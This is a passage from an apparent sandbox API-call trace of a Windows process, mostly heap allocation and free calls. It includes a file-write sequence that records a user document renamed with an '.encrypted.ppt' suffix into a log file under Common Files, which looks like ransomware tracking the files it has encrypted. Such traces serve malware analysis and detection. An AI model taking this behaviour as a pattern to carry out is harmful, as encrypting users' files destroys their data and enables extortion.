returned 0x7af4f8 [0035.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0035.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0035.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0035.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0035.535] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0035.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0035.535] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0035.535] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.535] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0035.535] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.535] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0035.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0035.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0035.535] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0035.536] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x19c5, lpOverlapped=0x0) returned 1 [0035.536] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0035.536] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x19c5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.536] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0035.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0035.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0035.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0035.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.encrypted.ppt\r\n", cchWideChar=115, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 115 [0035.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x73) returned 0x7800d0 [0035.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.encrypted.ppt\r\n", cchWideChar=115, lpMultiByteStr=0x7800d0, cbMultiByte=115, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.encrypted.ppt\r\n", lpUsedDefaultChar=0x0) returned 115 [0035.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0035.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0035.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7800d0 | out: hHeap=0x770000) returned 1 [0035.536] WriteFile (in: hFile=0x140, lpBuffer=0x7d5b30*, nNumberOfBytesToWrite=0x72, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7d5b30*, lpNumberOfBytesWritten=0x6aee3c*=0x72, lpOverlapped=0x0) returned 1 [0035.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0035.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.536] CloseHandle (hObject=0x140) returned 1 [0035.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0035.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0035.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0035.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0035.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0035.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0035.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c95d0 | out: hHeap=0x770000) returned 1 [0035.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0035.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0035.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0035.538] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0035.538] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0035.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0035.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0035.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0035.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0035.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0035.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0035.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0035.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0035.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0035.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0035.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0035.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0035.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0035.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0035.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0035.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0035.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0035.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0035.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0035.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0035.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0035.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0035.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0035.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0035.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0035.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0035.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0035.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0035.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0035.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0035.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0035.539] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0035.539] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.539] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0035.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0035.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0035.539] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0035.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0035.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0035.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5c8 [0035.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0035.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0035.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0035.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0035.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0035.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0035.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb80 [0035.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0035.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0035.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0035.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0035.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0035.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0035.540] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0035.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0035.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0035.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0035.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0035.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0035.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0035.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0035.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0035.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0035.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0035.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0035.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0035.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0035.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0035.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0035.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0035.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0035.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0035.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0035.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0035.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0035.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0035.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0035.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0035.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0035.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0035.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0035.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0035.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0035.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0035.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0035.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0035.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0035.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0035.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0035.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0035.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0035.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0035.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0035.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0035.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0035.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0035.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0035.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0035.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0035.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0035.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0035.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0035.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0035.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0035.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0035.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0035.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0035.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0035.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0035.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0035.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0035.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0035.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0035.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0035.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0035.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0035.542] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0035.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0035.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0035.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0035.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0035.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0035.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0035.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0035.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0035.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0035.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0035.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0035.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0035.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0035.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0035.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0035.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0035.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0035.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0035.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0035.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0035.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0035.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0035.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0035.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0035.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0035.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0035.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0035.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0035.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: 